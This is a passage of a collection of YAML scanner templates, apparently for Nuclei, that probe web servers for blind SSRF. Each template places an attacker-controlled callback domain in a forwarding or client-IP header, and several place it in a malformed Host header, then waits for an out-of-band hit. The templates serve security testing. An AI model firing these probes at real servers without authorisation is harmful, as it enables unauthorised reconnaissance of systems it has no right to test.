6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Remote-Addr: {{Host}}.{{Port}}.BSSRF-020.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-21.yaml:
--------------------------------------------------------------------------------
1 | id: 0x021
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | True-Client-IP: {{Host}}.{{Port}}.BSSRF-021.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-22.yaml:
--------------------------------------------------------------------------------
1 | id: 0x022
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Client-IP: {{Host}}.{{Port}}.BSSRF-022.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-23.yaml:
--------------------------------------------------------------------------------
1 | id: 0x023
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Client-IP: {{Host}}.{{Port}}.BSSRF-023.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-24.yaml:
--------------------------------------------------------------------------------
1 | id: 0x024
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Cluster-Client-IP: {{Host}}.{{Port}}.BSSRF-024.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-25.yaml:
--------------------------------------------------------------------------------
1 | id: 0x025
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | WL-Proxy-Client-IP: {{Host}}.{{Port}}.BSSRF-025.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-26.yaml:
--------------------------------------------------------------------------------
1 | id: 0x026
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Proxy-Client-IP: {{Host}}.{{Port}}.BSSRF-026.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-27.yaml:
--------------------------------------------------------------------------------
1 | id: 0x027
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Fastly-Client-Ip: {{Host}}.{{Port}}.BSSRF-027.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-28.yaml:
--------------------------------------------------------------------------------
1 | id: 0x028
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | True-Client-Ip: {{Host}}.{{Port}}.BSSRF-028.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-29.yaml:
--------------------------------------------------------------------------------
1 | id: 0x029
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Real-IP: {{Host}}.{{Port}}.BSSRF-029.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-3.yaml:
--------------------------------------------------------------------------------
1 | id: 0x003
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-003.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-30.yaml:
--------------------------------------------------------------------------------
1 | id: 0x030
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Originating-IP: {{Host}}.{{Port}}.BSSRF-030.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-31.yaml:
--------------------------------------------------------------------------------
1 | id: 0x031
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Ali-CDN-Real-IP: {{Host}}.{{Port}}.BSSRF-031.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-32.yaml:
--------------------------------------------------------------------------------
1 | id: 0x032
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Cdn-Src-Ip: {{Host}}.{{Port}}.BSSRF-032.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-33.yaml:
--------------------------------------------------------------------------------
1 | id: 0x033
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Cdn-Real-Ip: {{Host}}.{{Port}}.BSSRF-033.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-34.yaml:
--------------------------------------------------------------------------------
1 | id: 0x034
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | CF-Connecting-IP: {{Host}}.{{Port}}.BSSRF-034.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-35.yaml:
--------------------------------------------------------------------------------
1 | id: 0x035
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Host: {{Host}}.{{Port}}.BSSRF-035.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-36.yaml:
--------------------------------------------------------------------------------
1 | id: 0x036
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Custom-IP-Authorization: {{Host}}.{{Port}}.BSSRF-036.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-37.yaml:
--------------------------------------------------------------------------------
1 | id: 0x037
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Referer: {{Scheme}}://{{Host}}.{{Port}}.BSSRF-037.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-38.yaml:
--------------------------------------------------------------------------------
1 | id: 0x038
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded-For: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-038.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-39.yaml:
--------------------------------------------------------------------------------
1 | id: 0x039
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded-Host: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-039.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-4.yaml:
--------------------------------------------------------------------------------
1 | id: 0x004
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}:@{{Host}}.{{Port}}.BSSRF-004.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-40.yaml:
--------------------------------------------------------------------------------
1 | id: 0x040
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-040.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-41.yaml:
--------------------------------------------------------------------------------
1 | id: 0x041
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Forwarded-For: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-041.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-42.yaml:
--------------------------------------------------------------------------------
1 | id: 0x042
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Forwarded: for={{Hostname}}@{{Host}}.{{Port}}.BSSRF-042.{{MY-DOMAIN}};by={{Hostname}}@{{Host}}.{{Port}}.BSSRF-042.{{MY-DOMAIN}};host={{Hostname}}@{{Host}}.{{Port}}.BSSRF-042.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-43.yaml:
--------------------------------------------------------------------------------
1 | id: 0x43
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Remote-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-043.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-44.yaml:
--------------------------------------------------------------------------------
1 | id: 0x044
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Remote-Addr: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-044.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-45.yaml:
--------------------------------------------------------------------------------
1 | id: 0x045
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | True-Client-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-045.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-46.yaml:
--------------------------------------------------------------------------------
1 | id: 0x046
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Client-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-046.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-47.yaml:
--------------------------------------------------------------------------------
1 | id: 0x047
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Client-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-047.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-48.yaml:
--------------------------------------------------------------------------------
1 | id: 0x048
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Cluster-Client-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-048.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-49.yaml:
--------------------------------------------------------------------------------
1 | id: 0x049
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | WL-Proxy-Client-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-049.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-5.yaml:
--------------------------------------------------------------------------------
1 | id: 0x005
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | Host: {{Hostname}} @{{Host}}.{{Port}}.BSSRF-005.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-50.yaml:
--------------------------------------------------------------------------------
1 | id: 0x050
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Proxy-Client-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-050.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-51.yaml:
--------------------------------------------------------------------------------
1 | id: 0x051
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Fastly-Client-Ip: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-051.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-52.yaml:
--------------------------------------------------------------------------------
1 | id: 0x052
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | True-Client-Ip: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-052.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-53.yaml:
--------------------------------------------------------------------------------
1 | id: 0x053
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Real-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-053.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-54.yaml:
--------------------------------------------------------------------------------
1 | id: 0x054
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Originating-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-054.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-55.yaml:
--------------------------------------------------------------------------------
1 | id: 0x055
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Ali-CDN-Real-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-055.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-56.yaml:
--------------------------------------------------------------------------------
1 | id: 0x056
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Cdn-Src-Ip: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-056.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-57.yaml:
--------------------------------------------------------------------------------
1 | id: 0x057
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Cdn-Real-Ip: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-057.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-58.yaml:
--------------------------------------------------------------------------------
1 | id: 0x058
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | CF-Connecting-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-058.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-59.yaml:
--------------------------------------------------------------------------------
1 | id: 0x059
2 |
3 | info:
